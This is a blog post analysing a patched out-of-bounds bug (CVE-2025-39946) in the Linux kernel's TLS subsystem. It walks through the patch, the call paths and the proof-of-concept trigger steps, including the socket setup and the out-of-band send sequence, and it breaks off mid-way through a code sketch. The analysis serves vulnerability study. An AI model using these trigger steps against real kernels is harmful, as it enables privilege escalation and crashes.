Analysing a 1-day Vulnerability in the Linux Kernel's TLS Subsystem

October 01, 2025

I recently decided to start doing some Linux kernel security research in my free time, with the goal of creating one of my own submissions in Google's kernelCTF in the near future. For my first foray into the Linux kernel, I decided to analyse a recent submission from the same kernelCTF.

Finding Patched Vulnerabilities
Why Analyse Old Vulnerabilities?
The Vulnerability
Short Detour - Research Environment Setup
Prior Research on kTLS
Reaching the Attack Surface
Analysing the Patched Functions
Understanding the Vulnerability
Out of bounds access on the frags array
Reaching the Vulnerable Code
Setting Copy Mode on the TLS Parser
Vulnerability Analysis Recap
The First PoC
Step-by-step Construction of the PoC
The Path to Exploitation
The End

Finding Patched Vulnerabilities

Fortunately for me, Google's kernelCTF makes it really easy to find examples of patched vulnerabilities. The public kCTF spreadsheet contains every kCTF submission, including patch commits when they're available.

I decided to analyse the latest submission, as there were zero details on it other than the patch commit.

Why Analyse Old Vulnerabilities?

In my experience, the best way to learn about any research target is to dive right into analysing patched vulnerabilities, so that's what I decided to do. Of course, this was probably the hardest vulnerability I could have chosen, given that the only thing publicly available was the patch commit, but am I really learning something if it's not extremely difficult? 😅

The Vulnerability

This vulnerability hasn't been assigned a CVE yet (EDIT: it's CVE-2025-39946), but you can find the patch commit here. It was fixed in version 6.12.49 of the Linux kernel.

Looking at the commit, we see some useful information in the description:

So this was a vulnerability in the kernel TLS subsystem (found under net/tls). Based on the commit description, we can assume it has something to do with parsing invalid TLS headers, and that it likely leads to an out-of-bounds access on an allocated SKB.

Let's look at the patch itself:

Let's compare these code changes to the functions in question in Linux 6.12.48 (i.e before the patch was applied):

If we study this code, we notice that there are actually two separate changes:

In tls_strp_copyin_frag(), a length check has been added when accessing the skb_shinfo(skb)->frags array.
The call to tls_strp_abort_strp() has been moved from tls_strp_read_sock() to tls_rx_msg_size().

After knowing all of this, what are the next steps? How do we figure out how to reach this code?

Short Detour - Research Environment Setup

I just wanted to write some short notes about how I got a Linux kernel research environment set up.

The only important information here is probably the following: Ensure CONFIG_TLS=y is enabled in your kernel config. This is enabled in the kCTF instances.

Feel free to skip to the next section if you already have a research environment set up.

The steps are roughly as follows (assuming a Linux host):

Fetch the kernel source code from https://kernel.org. In this case, we use version 6.12.48.
Install qemu-system-x86_64.
Compile the kernel with the necessary debug options (plenty of other articles online about this).
Use busybox to statically compile the necessary utility files (ls, cd, etc) (plenty of articles online about this as well).

Once you've done all of this, compile your PoC / exploit statically and place it in an initramfs/ directory. You can then pack it all up into an initramfs.tgz file with the following script:

cd initramfs
find . -print0 | cpio --null -ov -H newc | gzip -9 > ../initramfs.tgz
cd ..

Then, you can run the kernel using qemu-system-x86_64 with the following script:

# Copy the compiled Linux kernel bzImage to the current directory
cp ../linux-6.12.48/arch/x86/boot/bzImage .

# Compile the exploit, move it to the initramfs, and pack it all up
./make.sh
./pack.sh

# nokaslr on the kernel command line disables KASLR
qemu-system-x86_64 \
    -enable-kvm \
    -cpu host \
    -smp 1 \
    -kernel ./bzImage \
    -initrd ./initramfs.tgz \
    -nographic \
    -append "console=ttyS0 kgdbwait kgdboc=ttyS1,115200 oops=panic panic=0 quiet nokaslr" \
    -m 512M \
    -netdev user,id=mynet0 \
    -device virtio-net-pci,netdev=mynet0 \
    -s

QEMU should start up and give you a shell. You can execute your exploit here.

For debugging, you can open the compiled vmlinux file (found in linux-6.12.48/vmlinux) in GDB, and use the command target remote :1234.

Prior Research on kTLS

Before analysing any patched vulnerability, it's important to find and absorb all prior research on the research target. This helps save a lot of time during analysis.

To that end, I found the following articles really helpful for understanding the basics of how the kTLS subsystem works:

Linux Kernel TLS Part 1.
Linux Kernel TLS Part 2.
Analysis of CVE-2025-37756, an UAF Vulnerability in Linux KTLS.
Exploiting a bug in the Linux kernel with Zig
Previous kTLS related kCTF submissions on the Google security-research Github repository (Take the CVEs from the kCTF public submissions spreadsheet and search for them here).

Additionally, it will be necessary to understand the basics of how sockets and socket buffers work in the Linux kernel. For this, I recommend reading a range of different writeups on vulnerabilities found in the net/ subsystem. I will list a few of them here, but do note that a lot of this understanding really just comes from experimentation and reading kernel code:

I highly recommend reading through these other articles if you have any trouble understanding parts of my blog post. I'm also always open to DMs on twitter!

Reaching the Attack Surface

After reading through the above research, we learn a lot about not only how the kTLS subsystem works, but also how to reach the code from userland. A high level overview of the steps needed to reach the subsystem is as follows:

Set up a TCP listener.
Connect to the TCP listener.
Enable TCP_ULP on either side of the connection (on the socket).
Set up the TLS_TX and TLS_RX (transmit and receive) with your chosen crypto algorithm, as well as either TLS 1.2 or TLS 1.3.

At this point, any data sent and received through the TLS ULP enabled socket will be handled by the kTLS subsystem.

Some example code that does the above for a specific socket:

void setup_tls(int sock)
{
	// Choose the crypto algorithm
	struct tls12_crypto_info_aes_ccm_128 crypto = {0};
	crypto.info.version = TLS_1_2_VERSION;
	crypto.info.cipher_type = TLS_CIPHER_AES_CCM_128;

	// Enable TLS ULP
	SYSCHK(setsockopt(sock, SOL_TCP, TCP_ULP, "tls", sizeof("tls")));

	// Setup TLS_TX and TLS_RX (transmit and receive)
	SYSCHK(setsockopt(sock, SOL_TLS, TLS_TX, &crypto, sizeof(crypto)));
	SYSCHK(setsockopt(sock, SOL_TLS, TLS_RX, &crypto, sizeof(crypto)));
}

It's helpful to read through the setsockopt syscall handler code to fully understand how these socket options are handled. For example the code that handles setting up TCP_ULP can be found here.

Analysing the Patched Functions

Combining the patch commit with the prior research, we know that changes were made to the following functions, and we also know what they do:

tls_strp_read_sock() - This function is called whenever new data is received on a TCP_ULP enabled socket. It uses a TLS parser object (the strp variable) to keep track of the parser state, and the strp->anchor SKB, which serves as a marker for incoming TLS records on the socket.
tls_rx_msg_size() - This function parses the TLS header. It's called through tls_strp_read_sock(), tls_strp_copyin_frag() and tls_strp_copyin_skb().
tls_strp_copyin_frag() - I did not find any information about this function anywhere, so I'll provide the analysis later.

Recapping on the changes that were made in the commit:

In tls_strp_copyin_frag(), a length check has been added when accessing the skb_shinfo(skb)->frags array.
The call to tls_strp_abort_strp() has been moved from tls_strp_read_sock() to tls_rx_msg_size().

We'll look at the changes in tls_strp_copyin_frag() a bit later. For now, to understand why the call to tls_strp_abort_strp() was moved into tls_rx_msg_size(), let's check all three callsites of tls_rx_msg_size():

// tls_strp_read_sock()
sz = tls_rx_msg_size(strp, strp->anchor);
if (sz < 0) {
	tls_strp_abort_strp(strp, sz);
	return sz;
}

// tls_strp_copyin_skb()
sz = tls_rx_msg_size(strp, skb);
if (sz < 0)
	return sz;

// tls_strp_copyin_frag()
sz = tls_rx_msg_size(strp, skb);
if (sz < 0)
	return sz;

Evidently, tls_strp_abort_strp() was only being called when tls_rx_msg_size() returns an error through the tls_strp_read_sock() callsite. The other two callsites just return the error back directly.

tls_strp_abort_strp() is short and easy to read. It aborts the TLS parser, effectively making this specific socket unusable.

Looking at tls_rx_msg_size(), it does the following:

Ensures that skb->len >= strp->stm.offset + prot->prepend_size - Here, the variables can be described as follows:
- skb is the socket buffer containing the incoming data. skb->len is the amount of data in the socket buffer.
- strp->stm.offset is the offset into the strp->anchor SKB where the TLS record starts.
- prot->prepend_size is the size of the full TLS header (header + extra stuff, like nonce) that must be prepended to a TLS record.
If the above check doesn't pass, an incomplete header (i.e. not enough bytes) was sent, and the function returns 0.
Copies the header from the skb to the header stack buffer.
Parses the header. If a malformed header is detected, a value < 0 is returned.
Parses ((header[4] & 0xFF) | (header[3] << 8)) as the TLS record size.

Assuming parsing is successful, this function returns the TLS record size parsed from the header (it also adds 5 to it to account for the 5-byte header, but that's not important).
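To make the three outcomes concrete, here is a minimal userland sketch of the same idea. It is not the kernel function: model_rx_msg_size(), the MODEL_* constants, and the negative return values are names I made up for illustration, and the validity checks (version bytes 0x03 0x03, an upper bound on the length) are simplified assumptions rather than the kernel's exact rules.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define MODEL_TLS_HEADER_SIZE 5             /* type(1) + version(2) + length(2) */
#define MODEL_MAX_RECORD_LEN  (16384 + 256) /* hypothetical upper bound */

/* Returns 0 for an incomplete header, a negative value for a malformed
 * one, and otherwise the record length plus the 5-byte header. */
int model_rx_msg_size(const uint8_t *buf, size_t len, size_t prepend_size)
{
    assert(prepend_size >= MODEL_TLS_HEADER_SIZE);

    if (len < prepend_size)
        return 0;   /* not enough bytes yet */

    /* Assumption: the record version bytes must be 0x03 0x03. */
    if (buf[1] != 0x03 || buf[2] != 0x03)
        return -1;  /* arbitrary error value for this sketch */

    int data_len = (buf[4] & 0xFF) | (buf[3] << 8);
    if (data_len > MODEL_MAX_RECORD_LEN)
        return -2;  /* arbitrary error value for this sketch */

    return data_len + MODEL_TLS_HEADER_SIZE;
}
```

Feeding it a single byte gives 0 (incomplete), feeding it 13 bytes of 0x41 gives a negative value (malformed), and a well-formed header with length bytes 0x01 0x00 gives 0x100 + 5.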

Understanding the Vulnerability

After understanding the above functions, we know that if tls_strp_read_sock() -> tls_rx_msg_size() returns an error, then the TLS parser is aborted and the socket is rendered unusable. However, the same parser isn't aborted in the other callsites!

Quick note: I won't be explaining this too much, but reaching tls_strp_copyin_frag() is much easier than tls_strp_copyin_skb(), so we'll only focus on tls_strp_copyin_frag(). The vulnerability is fixed in general anyway.

The call paths that lead to tls_strp_copyin_frag() are as follows:

// With `strp->copy_mode = 0`
tls_strp_read_sock() -> tls_strp_read_copy() -> tls_strp_read_copyin() -> tcp_read_sock() -> tls_strp_copyin() -> tls_strp_copyin_frag()

// With `strp->copy_mode = 1`
tls_strp_read_sock() -> tls_strp_read_copyin() -> tcp_read_sock() -> tls_strp_copyin() -> tls_strp_copyin_frag()

The main difference here is as follows (remembering that TLS header parsing occurs through tls_rx_msg_size()):

When strp->copy_mode == 0 - TLS header parsing occurs before tls_strp_copyin_frag() is reached.
When strp->copy_mode == 1 - tls_strp_copyin_frag() will be reached before TLS header parsing occurs.

Why this difference matters will become evident very soon.

Now, we know that tls_strp_copyin_frag() doesn't abort the TLS parser when it sees an invalid header, but it does return the error. How is this error handled?

static int tls_strp_copyin(/* ... */)
{
	// [ ... ]

	if (IS_ENABLED(CONFIG_TLS_DEVICE) && strp->mixed_decrypted)
		ret = tls_strp_copyin_skb(strp, skb, in_skb, offset, in_len);
	else
		ret = tls_strp_copyin_frag(strp, skb, in_skb, offset, in_len);
	if (ret < 0) {
		desc->error = ret;
		ret = 0;
	}
    // [ ... ]
}

The error is set into desc->error, and 0 is returned. This error is returned by tls_strp_read_sock() back to tls_strp_check_rcv(), which only checks for -ENOMEM:

void tls_strp_check_rcv(struct tls_strparser *strp)
{
	if (unlikely(strp->stopped) || strp->msg_ready)
		return;

	if (tls_strp_read_sock(strp) == -ENOMEM)
		queue_work(tls_strp_wq, &strp->work);
}

Since it's unrealistic to run into -ENOMEM, we can ignore this. Effectively, there is no error handling when TLS header parsing through tls_rx_msg_size() returns an error in tls_strp_copyin_frag().

Looking at the tls_strp_copyin_frag() function with all this context, it's easy to understand the vulnerability.

Let's assume for this example that the following conditions are true.

skb_shinfo(skb)->frags array has only one fragment in it. Initially, skb->len will be 0 (no data has been read into the strp->anchor SKB yet), so skb->len / PAGE_SIZE will also be 0, and so the first fragment will correctly be accessed.
strp->stm.full_len is 0. This means that a full TLS header has not been parsed yet. This condition is necessary to reach the tls_rx_msg_size() call, which is where the vulnerability occurs.

Let's consider the two non-error conditions of tls_rx_msg_size() with the above context:

tls_rx_msg_size() returns 0 - An incomplete header was received. This effectively resets skb->len back to zero and exits.
tls_rx_msg_size() returns a positive value - A complete header was parsed and the TLS record size is returned. strp->stm.full_len is set to the size, and a while loop is used to read the rest of the data from in_skb (i.e the incoming data) into the anchor SKB's frags array.

Effectively, in both cases, skb->len will correctly be set to the amount of data that was read from in_skb (either 0, or the amount of data read). Since the data is read into the frags array, this also implies that skb->len is the combined amount of data across all the fragments in the frags array.

Now, what actually happens in the error condition?

Out of bounds access on the frags array

Let's look at the code just up until the error is returned:

static int tls_strp_copyin_frag(struct tls_strparser *strp, struct sk_buff *skb,
				struct sk_buff *in_skb, unsigned int offset,
				size_t in_len)
{
	size_t len, chunk;
	skb_frag_t *frag;
	int sz;

	frag = &skb_shinfo(skb)->frags[skb->len / PAGE_SIZE];

	len = in_len;
	/* First make sure we got the header */
	if (!strp->stm.full_len) {
		/* Assume one page is more than enough for headers */
		chunk =	min_t(size_t, len, PAGE_SIZE - skb_frag_size(frag));
		WARN_ON_ONCE(skb_copy_bits(in_skb, offset,
					   skb_frag_address(frag) +
					   skb_frag_size(frag),
					   chunk));

		skb->len += chunk;
		skb->data_len += chunk;
		skb_frag_size_add(frag, chunk);

		sz = tls_rx_msg_size(strp, skb);
		if (sz < 0)
			return sz;
    
		// [ ... ]
	}
	// [ ... ]
}

We can see that the code copies chunk bytes of data from in_skb into frag. Additionally, skb->len and frag->len are both increased by chunk.

chunk is bounded by either the amount of data in in_skb or the space left in the fragment (at most PAGE_SIZE == 0x1000), whichever is lower.

Crucially though, when tls_rx_msg_size() returns an error, it simply returns without ever resetting skb->len / frag->len! As a side effect, strp->stm.full_len will also still be set to 0, meaning this branch can be hit again if we can call back into tls_strp_copyin_frag().

Now, how does this help us access out-of-bounds of the frags array?

Let's assume in_skb contains at least a page's worth of data (i.e at least 0x1000 bytes). We essentially have a primitive here that lets us increase skb->len by 0x1000, and since we can call this function repeatedly by going through tls_strp_read_sock(), we can effectively increase skb->len and access a fragment in the frags array that doesn't exist.

For example, if we assume there is one fragment in the frags array, then initially skb->len == 0 causes frags[0] to be accessed. If we then cause skb->len to increase by 0x1000, then on the next invocation of tls_strp_copyin_frag(), frags[1] will be accessed instead. Since we assume that only one fragment exists, this is effectively an out of bounds access.
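The index arithmetic is easy to model in userland. The sketch below is only a model under my own assumptions: struct model_anchor and both functions are hypothetical names, the 8-slot array is an arbitrary size for the model, and the only thing it mirrors is the bookkeeping that the error path leaves behind.

```c
#include <assert.h>
#include <stddef.h>

#define MODEL_PAGE_SIZE 0x1000u
#define MODEL_SLOTS     8       /* arbitrary array size for this model */

/* Hypothetical model of the anchor SKB state that matters here. */
struct model_anchor {
    size_t len;                    /* mirrors skb->len */
    size_t nr_frags;               /* fragments actually allocated */
    size_t frag_size[MODEL_SLOTS]; /* mirrors skb_frag_size() per slot */
};

/* Index computed at the top of tls_strp_copyin_frag(). */
size_t model_frag_index(const struct model_anchor *a)
{
    return a->len / MODEL_PAGE_SIZE;
}

/* One call that ends in a header parse error: the lengths are bumped by
 * chunk and never rolled back. Returns the index that was used. */
size_t model_failed_copyin(struct model_anchor *a, size_t in_len)
{
    size_t idx = model_frag_index(a);
    assert(idx < MODEL_SLOTS);

    size_t room = MODEL_PAGE_SIZE - a->frag_size[idx];
    size_t chunk = in_len < room ? in_len : room;

    a->len += chunk;
    a->frag_size[idx] += chunk;
    return idx;
}
```

With nr_frags set to 1 and an in_len of at least 0x1000, a single failed call uses index 0 and leaves len at 0x1000, so the next call computes index 1, which is past the only fragment that exists.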

Reaching the Vulnerable Code

Let's take a look at the callpaths to tls_strp_copyin_frag() again:

// With `strp->copy_mode = 0`
tls_strp_read_sock() -> tls_strp_read_copy() -> tls_strp_read_copyin() -> tcp_read_sock() -> tls_strp_copyin() -> tls_strp_copyin_frag()

// With `strp->copy_mode = 1`
tls_strp_read_sock() -> tls_strp_read_copyin() -> tcp_read_sock() -> tls_strp_copyin() -> tls_strp_copyin_frag()

Looking at tls_strp_read_sock(), when strp->copy_mode == 0, we can see that there is already a call to tls_rx_msg_size(), and if an invalid header is spotted at this point, then the TLS parser is aborted:

static int tls_strp_read_sock(struct tls_strparser *strp)
{
	// [ ... ]
	if (!strp->stm.full_len) {
		sz = tls_rx_msg_size(strp, strp->anchor);
		if (sz < 0) {
			tls_strp_abort_strp(strp, sz);
			return sz;
		}

		strp->stm.full_len = sz;

		// Faith: `tls_strp_read_copy()` ends up calling `tls_strp_copyin_frag()`
		if (!strp->stm.full_len || inq < strp->stm.full_len)
			return tls_strp_read_copy(strp, true);
	}
    // [ ... ]
}

Since we want tls_rx_msg_size() to return an error inside tls_strp_copyin_frag(), we obviously can't go through this callpath. If tls_rx_msg_size() doesn't return an error here, then it won't return an error inside tls_strp_copyin_frag() either (and if it does return an error here, then TLS parsing is aborted).

The only other option we have is this call to tls_strp_read_copyin():

static int tls_strp_read_sock(struct tls_strparser *strp)
{
	// [ ... ]
	if (unlikely(strp->copy_mode))
		return tls_strp_read_copyin(strp);
    // [ ... ]
}

We know that this will work since it doesn't call tls_rx_msg_size() beforehand. However, it requires copy mode to be set. How can we do that?

Setting Copy Mode on the TLS Parser

Grepping for strp->copy_mode = 1, there are two callsites: tls_strp_msg_cow() and tls_strp_read_copy().

tls_strp_msg_cow() goes through the hardware code path, so we can ignore that (TLS receiving is typically done on the software level).

We already know we can call tls_strp_read_copy() through tls_strp_read_sock() (i.e by sending data to a TLS enabled socket) when copy mode is not set:

static int tls_strp_read_sock(struct tls_strparser *strp)
{
	// [ ... ]
	if (!strp->stm.full_len) {
		// [ ... ]

		// Faith: `tls_strp_read_copy()` ends up calling `tls_strp_copyin_frag()`
		if (!strp->stm.full_len || inq < strp->stm.full_len)
			return tls_strp_read_copy(strp, true);
	}
    // [ ... ]
}

The only requirement is that tls_rx_msg_size() returns 0 (i.e. an incomplete TLS header). We can completely ignore the second condition, because if strp->stm.full_len is ever set to a non-zero value, then tls_rx_msg_size() will never be called in tls_strp_copyin_frag(), meaning we will never be able to trigger our vulnerability.

Looking at tls_strp_read_copy(), we come across our first hurdle:

static int tls_strp_read_copy(struct tls_strparser *strp, bool qshort)
{
	// [ ... ]
	/* If the rbuf is small or rcv window has collapsed to 0 we need
	 * to read the data out. Otherwise the connection will stall.
	 * Without pressure threshold of INT_MAX will never be ready.
	 */
	if (likely(qshort && !tcp_epollin_ready(strp->sk, INT_MAX)))
		return 0;
    // [ ... ]
}

We know qshort is already set to true, so now we need tcp_epollin_ready() to return true:

static inline bool tcp_epollin_ready(const struct sock *sk, int target)
{
	const struct tcp_sock *tp = tcp_sk(sk);
	int avail = READ_ONCE(tp->rcv_nxt) - READ_ONCE(tp->copied_seq);

	if (avail <= 0)
		return false;

	return (avail >= target) || tcp_rmem_pressure(sk) ||
	       (tcp_receive_window(tp) <= inet_csk(sk)->icsk_ack.rcv_mss);
}

This function effectively checks for three things:

avail >= target - Here, target is INT_MAX, and avail is set to the amount of data to fetch out of the socket receive queue. Triggering this requires just a bit over 2GB of unread data to be in the receive queue.
tcp_rmem_pressure(sk) - Returns true if the socket's receive buffer is more than 87.5% full, or if TCP as a whole is under memory pressure.
tcp_receive_window(tp) <= inet_csk(sk)->icsk_ack.rcv_mss - Something to do with the advertised TCP receive window shrinking below the receive MSS. I didn't investigate this because it's not important.

I experimented for a while and found out that option 2 (triggering memory pressure) is the easiest approach to take. The tcp_rmem_pressure() function looks like this:

static inline bool tcp_rmem_pressure(const struct sock *sk)
{
	int rcvbuf, threshold;

	if (tcp_under_memory_pressure(sk))
		return true;

	rcvbuf = READ_ONCE(sk->sk_rcvbuf);
	threshold = rcvbuf - (rcvbuf >> 3);

	return atomic_read(&sk->sk_rmem_alloc) > threshold;
}

This approach is the easiest because sk->sk_rmem_alloc tracks how much memory is currently charged to the socket's receive queue, and sk->sk_rcvbuf can be controlled by setting SO_RCVBUF using setsockopt(). We can simply shrink the buffer and then send a large amount of garbage data to trigger memory pressure.
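The threshold arithmetic is worth checking by hand. The helpers below are hypothetical names of mine that copy only the shift-and-subtract from tcp_rmem_pressure() and ignore the global tcp_under_memory_pressure() check. I use 0x900 as an example receive buffer size.

```c
#include <assert.h>

/* Same arithmetic as tcp_rmem_pressure(): rcvbuf minus one eighth. */
int model_rmem_threshold(int rcvbuf)
{
    assert(rcvbuf >= 0);
    return rcvbuf - (rcvbuf >> 3);
}

/* True once the charged receive memory exceeds the threshold. */
int model_rmem_pressure(int rmem_alloc, int rcvbuf)
{
    return rmem_alloc > model_rmem_threshold(rcvbuf);
}
```

For a 0x900 byte buffer the threshold works out to 0x900 - 0x120 = 0x7e0, and the comparison is strict, so pressure only starts at 0x7e1.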

Assuming we are able to trigger memory pressure, and also assuming strp->stm.full_len is 0 (again, it's a requirement to trigger the vulnerability later in tls_strp_copyin_frag()), we can analyze the rest of tls_strp_read_copy():

static int tls_strp_read_copy(struct tls_strparser *strp, bool qshort)
{
	// [ ... ]
	need_spc = strp->stm.full_len ?: TLS_MAX_PAYLOAD_SIZE + PAGE_SIZE;

	for (len = need_spc; len > 0; len -= PAGE_SIZE) {
		// [ ... Allocate all fragments ... ]
	}

	strp->copy_mode = 1;
	// [ ... ]

	tls_strp_read_copyin(strp);

	return 0;
}

The function essentially does the following:

Allocate TLS_MAX_PAYLOAD_SIZE + PAGE_SIZE worth of fragments (i.e 5 fragments where each fragment is 1 page) on the strp->anchor SKB. These are stored in the anchor SKB's frags array.
Set strp->copy_mode to 1.
Call tls_strp_read_copyin(), which triggers tls_strp_copyin_frag().
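As a quick sanity check on the fragment count, this sketch replays the allocation loop's arithmetic in userland. The function name is hypothetical, and I'm assuming 4096-byte pages and a TLS_MAX_PAYLOAD_SIZE of 16384.

```c
#include <assert.h>

#define MODEL_PAGE_SIZE            4096
#define MODEL_TLS_MAX_PAYLOAD_SIZE 16384

/* Counts iterations of: for (len = need_spc; len > 0; len -= PAGE_SIZE) */
int model_frags_allocated(int full_len)
{
    int need_spc = full_len ? full_len
                            : MODEL_TLS_MAX_PAYLOAD_SIZE + MODEL_PAGE_SIZE;
    int count = 0;

    assert(need_spc > 0);
    for (int len = need_spc; len > 0; len -= MODEL_PAGE_SIZE)
        count++;
    return count;
}
```

With full_len == 0, need_spc is 20480 bytes, which is exactly 5 pages.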

If we end up in tls_strp_copyin_frag() with strp->stm.full_len set to 0 through this callpath, everything will be fine, because tls_rx_msg_size() is still acting on the same TLS header data that already caused tls_rx_msg_size() to return 0 inside tls_strp_read_sock().

Crucially though, copy mode will be enabled now. This means that the next time any data is received over the socket, tls_strp_read_copyin() will be directly called by tls_strp_read_sock(), bypassing the call to tls_rx_msg_size(). This is the exact moment when we want tls_rx_msg_size() to start returning errors due to malformed / invalid TLS header parsing.

Vulnerability Analysis Recap

Let's recap on what our analysis has suggested so far:

There are three callsites of the tls_rx_msg_size() function, which parses a TLS header out of incoming data.
Only one out of three of these callsites handles the error condition of complete but invalid TLS header data. This is the vulnerability.
Looking at the vulnerable callsite through tls_strp_copyin_frag(), the intention of this function is to receive the TLS record data into the anchor SKB's frags array. The data is stored as fragments in this array.
When we trigger an error in TLS parsing through tls_strp_copyin_frag(), it erroneously returns early.
When this early return occurs, the state of the TLS parser's anchor SKB is still updated. It erroneously thinks some data was read, when that never happened. This potentially updates the fragment that new data will be read into on subsequent invocations of this function.
We can trigger tls_strp_copyin_frag() over and over again with invalid TLS header data after copy mode is set. After the parsing fails enough times, we will start accessing elements of the frags array that are out of bounds of what has been initialized.

Knowing all this, let's try to construct a PoC to trigger the vulnerability.

The First PoC

This was the most time consuming part of the analysis process for me, as I had no experience with Linux kernel exploitation.

My initial PoC triggers a NULL pointer dereference when accessing an uninitialized fragment in the frags array. I'll explain why that happens, but before I get there, here is the PoC and the KASAN splat:

https://gist.github.com/farazsth98/2c3d75a44a0d6bdf3df0d4756b940fc1

The PoC has very detailed comments, so you can read those to understand more about what each line of the PoC is doing too!

Step-by-step Construction of the PoC

First, I set up a listener and connected a client to it. The socket that the client creates is the one that I enabled TLS on (i.e the listener sends data for the client to receive).

I used pthread_barrier_wait() to synchronize the two threads. You can find the listener thread here, and it's set up by the main client function here.

The function used to set up TLS is here. Crucially, this sets the size of the sk->sk_rcvbuf to the lowest possible value (0x900 in my testing), which allows us to trigger the memory pressure condition.

Finally, we can talk about the actual PoC. We can break down the entire PoC into three simple steps:

Send some data to trigger parsing of an incomplete TLS header while memory pressure is in effect. This causes copy mode to be enabled by tls_strp_read_copy(). The incomplete TLS header is important, as the only other option (a valid TLS header) prevents us from hitting the vulnerable code later.
Once copy mode is enabled, send more data to trigger the call to tls_rx_msg_size() inside tls_strp_copyin_frag(). Crucially, tls_rx_msg_size() MUST return an error at this point. If it doesn't, we won't be able to hit the vulnerable code.
At this point, the socket is all set up. We simply need to trigger tls_strp_copyin_frag() enough times to trigger the vulnerability and achieve out of bounds access on the strp->anchor SKB's frags array.

The First Hurdle - Triggering Memory Pressure with an Incomplete TLS Header

If we think about what step 1 entails, it actually sounds like it contradicts itself. Why?

To parse an incomplete TLS header, we have to send less data than the size of a complete TLS header (5 byte header + 8 byte nonce).
To trigger memory pressure, we need to fill up 87.5% of the 0x900 sized receive buffer, i.e 0x7e0 bytes. The only way to do this is to send that amount of data.

Obviously, if we trigger memory pressure, we won't be parsing an incomplete TLS header. And vice versa, if we parse an incomplete TLS header, there's no way for there to be any memory pressure.

If we think about this for a bit, we come up with a naive approach:

Send 1 byte of data - this will trigger tls_strp_read_sock(), which will just return early due to the incomplete header.
Send lots of garbage data - this will trigger tls_strp_read_sock() with memory pressure, and tls_strp_read_sock() will still need to process the SKB from step 1 before it gets to this one, since the previous SKB was never fully processed.

But this approach doesn't work due to a mechanism known as SKB coalescing. Whenever one SKB shows up after another in the TCP receive queue, tcp_try_coalesce() will be called to see if the new SKB can be coalesced into the old SKB. Unless we do something to prevent it, the coalesce will succeed, and the two sends end up merged.

Therefore, in our naive approach, when step 2 occurs, the garbage data will be coalesced with the 1 byte we sent earlier, and so tls_strp_read_sock() will attempt to parse all of the data at once, which will now just be an invalid TLS header. This will cause TLS parsing to be aborted.

This is where the patch commit description comes in clutch:

syzbot figured out a way to do this by serving us the header in small OOB sends, and then filling in the recvbuf with a large normal send.

In this sentence, OOB stands for out-of-band. Out-of-band data can be sent by setting the MSG_OOB flag on the sent data. One byte of the sent data gets stored outside the TCP receive queue. Jann Horn covered this in-depth in this Project Zero blog post.

Crucially, if a one-byte SKB is sent out-of-band, it prevents the next SKB from being coalesced with it (assuming the next SKB isn't also sent out-of-band).

Going back to our naive approach, we can now improve it:

Send 2 bytes of data out-of-band - this will trigger tls_strp_read_sock() twice, once with the 1 byte of data in the receive queue, and once with the 1 byte of out-of-band data. In both cases, it will just return early due to the incomplete 1 byte header.
Send lots of garbage data - this will trigger tls_strp_read_sock() with memory pressure, and tls_strp_read_sock() will still need to process the SKB from step 1 before it gets to this one.

Now step 2 will actually work as intended, since SKB coalescing will not occur. When we send the garbage data, tls_strp_read_sock() will actually attempt to process the first 1 byte of data that's still in the TCP receive queue.

The part of my PoC that does this is as follows:

    // Two bytes out-of-band sent to the client TLS socket.
    send(client, garbage, 2, MSG_OOB);

    // 0x8000 bytes of garbage sent to the client TLS socket.
    // Since MSG_OOB is not set, this won't coalesce with the previous sent data.
    send(client, garbage, 0x8000, 0);

When tls_strp_read_sock() triggers via the second send(), it processes the previously sent 1 byte of data from the TCP receive queue. It will then end up calling tls_strp_read_copy(). This time however, since the garbage data is in the TCP receive queue, memory pressure will be in effect!

The end result is that tls_strp_read_copy() will turn copy mode on for us, and then when it calls into tls_strp_copyin_frag(), TLS parsing in tls_rx_msg_size() will again see this same 1 byte of data, and therefore just return 0 for an incomplete TLS header.

But wait, if we try to trigger tls_strp_copyin_frag() after copy mode is turned on, won't it process the same 1 byte of data that's still in the receive queue? Wouldn't that mean that tls_rx_msg_size() will never return an error, since it never sees a complete but invalid TLS header?

A Lucky Coincidence

Notice that when tls_rx_msg_size() returns 0 inside tls_strp_copyin_frag(), the function itself doesn't return 0! It actually returns in_len - len:

static int tls_strp_copyin_frag(/* ... */)
{
	// [ ... ]
	if (!strp->stm.full_len) {
		// [ ... ]
		sz = tls_rx_msg_size(strp, skb);
		if (sz < 0)
			return sz;
        // [ ... ]

        len -= chunk;
        // [ ... ]

		strp->stm.full_len = sz;
		if (!strp->stm.full_len)
			goto read_done;
	}
    // [ ... ]
read_done:
	return in_len - len;
}

In the above scenario with my PoC, when tls_strp_copyin_frag() is called for the first time, both in_len and len will be set to 1. However, notice in the if branch above that chunk is subtracted from len. This will actually cause len to become 0, and thus in_len - len = 1 is what will be returned.

Now why is this important? When I showed the callpaths for tls_strp_copyin_frag(), I showed that tcp_read_sock() is called before it goes into tls_strp_copyin_frag(). Inside __tcp_read_sock(), we actually see the following code:

static int __tcp_read_sock(/* ... */)
{
	// [ ... ]
	while ((skb = tcp_recv_skb(sk, seq, &offset)) != NULL) {
		if (offset < skb->len) {
			// [ ... ]
			// Faith: recv_actor == tls_strp_copyin
			used = recv_actor(desc, skb, offset, len);
			if (used <= 0) {
				if (!copied)
					copied = used;
				break;
			}
		}
		// [ ... ]
		// Faith: eats the SKB!
		tcp_eat_recv_skb(sk, skb);
		// [ ... ]
	}
	// [ ... ]
}

Notice that when recv_actor (which is tls_strp_copyin()) returns a positive value, the SKB is considered consumed and thus eaten up (i.e removed from the TCP receive queue).

Coincidentally, this works perfectly for us. We can cause tls_strp_copyin_frag() to process this incomplete 1 byte TLS header once, and discard it for us (since tls_strp_copyin_frag() will return 1).

From then on, when we trigger tls_strp_read_sock(), it will actually start processing our garbage data! And when the TLS parsing error is returned to __tcp_read_sock(), it won't consume the SKB either!
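The consume-or-keep behaviour can be modelled in a few lines of userland C. Everything here is a hypothetical stand-in (struct model_skb, model_read_sock(), model_tls_actor()), partial consumption of an SKB is not modelled, and the 13-byte cutoff assumes the 5-byte header plus 8-byte nonce used in my PoC's cipher setup.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical stand-in for an SKB sitting in the TCP receive queue. */
struct model_skb {
    size_t len;   /* payload bytes */
    int eaten;    /* set once the loop removes it from the queue */
};

/* Returns bytes consumed; <= 0 stops the loop, like recv_actor. */
typedef int (*model_actor)(const struct model_skb *skb);

/* Simplified read loop: a positive return eats the SKB, anything else
 * leaves it queued and breaks out. Returns how many SKBs were eaten. */
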